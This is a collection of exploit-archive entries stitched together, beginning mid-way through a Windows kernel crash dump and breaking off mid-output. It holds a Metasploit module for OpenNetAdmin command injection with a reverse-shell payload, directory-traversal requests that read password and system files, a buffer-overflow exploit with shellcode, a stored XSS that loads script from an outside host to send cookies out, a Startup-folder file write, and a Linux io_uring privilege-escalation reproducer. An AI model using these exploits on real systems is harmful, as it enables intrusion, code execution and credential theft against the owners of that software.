rbp=ffffc709dee8f150 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 r14=ffffc709dee8f4b0 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!ExReleaseAutoExpandPushLockExclusive+0x264: fffff804`1f0d7c24 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7fe2: fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x42ce: fffff804`1f276cae 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x5060: fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!IofCallDriver+0x59: fffff804`1f12dba9 4883c438 add rsp,38h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtQueryInformationFile+0x1071: fffff804`1f6abb11 448bf0 mov r14d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtClose+0xffc: fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtDeviceIoControlFile+0x56: fffff804`1f64c356 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7925: fffff804`1f27a305 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 00007fff`33aaf844 ?? ??? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx # Mitigation Update to Lenovo Power Management driver version 1.67.17.48 or higher

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'OpenNetAdmin Ping Command Injection', 'Description' => %q{ This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1. }, 'Author' => [ 'mattpascoe', # Vulnerability discovery 'Onur ER <[email protected]>' # Metasploit module ], 'References' => [ ['EDB', '47691'] ], 'DisclosureDate' => '2019-11-19', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Automatic Target', {}] ], 'DefaultOptions' => { 'RPORT' => 80, 'payload' => 'linux/x86/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0)) register_options( [ OptString.new('VHOST', [false, 'HTTP server virtual host']), OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php']) ] ) end def check res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/x-www-form-urlencoded', 'encode_params' => false, 'vars_post' => { 'xajax' => 'window_open', 'xajaxargs[]' => 'app_about' } }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.body =~ /OpenNetAdmin/i return CheckCode::Safe end opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first version = Gem::Version.new('opennetadmin_version') if version vprint_status "OpenNetAdmin version #{version}" end if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1') return CheckCode::Appears end CheckCode::Detected end def exploit print_status('Exploiting...') execute_cmdstager(flavor: :printf) end def filter_bad_chars(cmd) cmd.gsub!(/chmod \+x/, 'chmod 777') end def execute_command(cmd, opts = {}) post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping" begin send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/x-www-form-urlencoded', 'encode_params' => false, 'data' => post_data }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end

# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal # Date: 2019-12-11 # Author: Numan Türle # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 POC --------- GET /../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- root:ABgia2Z.lfFhA:0:0::/root:/bin/sh

# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow # Date: 2019-12-12 # Exploit Author: boku # Discovered by: UN_NON # Original DoS: FTP Commander 8.02 - Overwrite (SEH) # Original DoS Link: https://www.exploit-db.com/exploits/37810 # Software Vendor: http://www.internet-soft.com/ # Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe # Version: Version 8.03 & Version 8.02 (same exploit for both) # Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418) # Windows 10 Education 1909 (32-bit; OS-build=18363.418) # Windows 10 Pro 1909 (32-bit; OS-build=18363.418) # Windows Vista Home Basic SP1 (6.0.6001 Build 6001) # Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600 # Python Version: Python 2.7.16+ # Recreate: # 1) Generate 'poc.txt' payload using python 2.7.x # 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy # 3) Install & Open ftpCommander v8.03 (or v8.02) # 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command # - A textbox will appear on the bottom of the right window # 5) Paste payload from generated txt file into textbox # 6) Click "Do it" # - The program will crash & calculator will open # Other Security Issue: # - The program's default install path is: C:\\cftp\cftp.exe #!/usr/bin/python blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet try: # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly # EIP jump lands at the beginning of the buffer # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper #x86/alpha_upper succeeded with size 447 (iteration=0) shellcode = b"" shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50" shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39" shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b" shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c" shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a" shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33" shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31" shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b" shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50" shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32" shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48" shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a" shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e" shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43" shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b" shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c" shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35" shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b" shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56" shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a" shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33" shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f" shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38" shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51" shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50" shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42" shellcode += b"\x4c\x32\x43\x53\x30\x41\x41" # Fill the rest of the space with B's until we are at our EIP offset offset = '\x42'*(4108-len(nops+shellcode)) # The EAX register holds a Pointer to the beginning of our buffer # FF20 = jmp [eax] # !mona find -o -s '\xFF\x20' # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] # | ASLR: False; Rebase: False; SafeSEH: False; eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00 # After jmp [eax], we land at the beginning of our buffer payload = nops+shellcode+offset+eip File = 'poc.txt' f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " except: print err + File + ' failed to create'

# Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting # Date: 2019-12-13 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19742 Reproduction Steps: 1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] 2. Go to Maintenance page and click on Admin on the left panel 3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page. 4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker. 5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage. #Burp Intercept POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 180 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht <http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal # Author: Patrik Lantz # Date: 2019-12-06 # Software: Roxy Fileman # Version: 1.4.5 # Vendor Homepage: http://www.roxyfileman.com/ # Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net # CVE: CVE-2019-19731 Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 (using custom account as application pool identity for the IIS worker process). =========================== Description =========================== Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on the IIS worker process privileges. This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution of this file will be triggered on the next login. Proof of Concept =========================== It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action. The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location. Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include the .lnk extension. 1) Create a shortcut file By using for example the target executable C:\Windows\System32\Calc.exe Remove the .lnk extension and rename it to use the .dat extension. 2) Upload the file Either upload the .dat file manually via the Roxy Fileman web interface or programmatically using a HTTP POST request. Details of the request: POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------159382831523528 Content-Length: 924 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list -----------------------------159382831523528 Content-Disposition: form-data; name="action" upload -----------------------------159382831523528 Content-Disposition: form-data; name="method" ajax -----------------------------159382831523528 Content-Disposition: form-data; name="d" /wwwroot/fileman/Uploads/test2 -----------------------------159382831523528 Content-Disposition: form-data; name="files[]"; filename="poc.dat" Content-Type: application/octet-stream ...data omitted... -----------------------------159382831523528-- 3) Write the file to the Startup folder using the RENAMEFILE action The new filename is set via the n parameter. The correct path can be identified by trial and error depending on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe). If the necessary directories do not exist, they can be created using the CREATEDIR action which also is vulnerable to path traversal. POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 66 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat Workaround / Fix: =========================== Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: CREATEDIR, COPYFILE and RENAMEFILE. Recommendations for users of Roxy Fileman: - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default. Timeline =========================== 2019-12-06: Discovered the vulnerability 2019-12-06: Reported to the vendor (vendor is unresponsive) 2019-12-11: Request CVE 2019-12-13: Advisory published Discovered By: =========================== Patrik Lantz

Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3), io_uring has support for asynchronously calling sendmsg(). Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue entries, which cause sendmsg() to be called either in syscall context in the original task, or - if that wasn't able to send a message without blocking - on a kernel worker thread. The problem is that sendmsg() can end up looking at the credentials of the calling task for various reasons; for example: - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX datagram socket ends up performing filesystem access checks - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at process credentials - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing capability checks against the calling process When the request has been handed off to a kernel worker task, all such checks are performed against the credentials of the worker - which are default kernel creds, with UID 0 and full capabilities. To force io_uring to hand off a request to a kernel worker thread, an attacker can abuse the fact that the opcode field of the SQE is read multiple times, with accesses to the struct msghdr in between: The attacker can first submit an SQE of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG. Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an IPv4 address to the loopback interface without having the required privileges for that: ========================================================================== $ cat uring_sendmsg.c #define _GNU_SOURCE #include <pthread.h> #include <unistd.h> #include <stdio.h> #include <err.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/ioctl.h> #include <linux/rtnetlink.h> #include <linux/if_addr.h> #include <linux/io_uring.h> #include <linux/userfaultfd.h> #include <linux/netlink.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static int uffd = -1; static struct iovec *iov; static struct iovec real_iov; static struct io_uring_sqe *sqes; static void *uffd_thread(void *dummy) { struct uffd_msg msg; int res = SYSCHK(read(uffd, &msg, sizeof(msg))); if (res != sizeof(msg)) errx(1, "uffd read"); printf("got userfaultfd message\n"); sqes[0].opcode = IORING_OP_SENDMSG; union { struct iovec iov; char pad[0x1000]; } vec = { .iov = real_iov }; struct uffdio_copy copy = { .dst = (unsigned long)iov, .src = (unsigned long)&vec, .len = 0x1000 }; SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy)); return NULL; } int main(void) { // initialize uring struct io_uring_params params = { }; int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params)); unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING)); unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING)); sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES)); // prepare userfaultfd-trapped IO vector page iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)); uffd = SYSCHK(syscall(SYS_userfaultfd, 0)); struct uffdio_api api = { .api = UFFD_API, .features = 0 }; SYSCHK(ioctl(uffd, UFFDIO_API, &api)); struct uffdio_register reg = { .mode = UFFDIO_REGISTER_MODE_MISSING, .range = { .start = (unsigned long)iov, .len = 0x1000 } }; SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg)); pthread_t thread; if (pthread_create(&thread, NULL, uffd_thread, NULL)) errx(1, "pthread_create"); // construct netlink message int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE)); struct sockaddr_nl addr = { .nl_family = AF_NETLINK }; struct { struct nlmsghdr hdr; struct ifaddrmsg body; struct rtattr opthdr; unsigned char addr[4]; } __attribute__((packed)) msgbuf = { .hdr = { .nlmsg_len = sizeof(msgbuf), .nlmsg_type = RTM_NEWADDR, .nlmsg_flags = NLM_F_REQUEST }, .body = { .ifa_family = AF_INET, .ifa_prefixlen = 32, .ifa_flags = IFA_F_PERMANENT, .ifa_scope = 0, .ifa_index = 1 }, .opthdr = { .rta_len = sizeof(struct rtattr) + 4, .rta_type = IFA_LOCAL }, .addr = { 1, 2, 3, 4 } }; real_iov.iov_base = &msgbuf; real_iov.iov_len = sizeof(msgbuf); struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr), .msg_iov = iov, .msg_iovlen = 1, }; // send netlink message via uring sqes[0] = (struct io_uring_sqe) { .opcode = IORING_OP_RECVMSG, .fd = sock, .addr = (unsigned long)&msg }; ((int*)(sq_ring + params.sq_off.array))[0] = 0; (*(int*)(sq_ring + params.sq_off.tail))++; int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0)); printf("submitted %d, getevents done\n", submitted); int cq_tail = *(int*)(cq_ring + params.cq_off.tail); printf("cq_tail = %d\n", cq_tail); if (cq_tail != 1) errx(1, "expected cq_tail==1"); struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes); if (cqe->res < 0) { printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res)); } else { printf("result: %d\n", cqe->res); } } $ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state 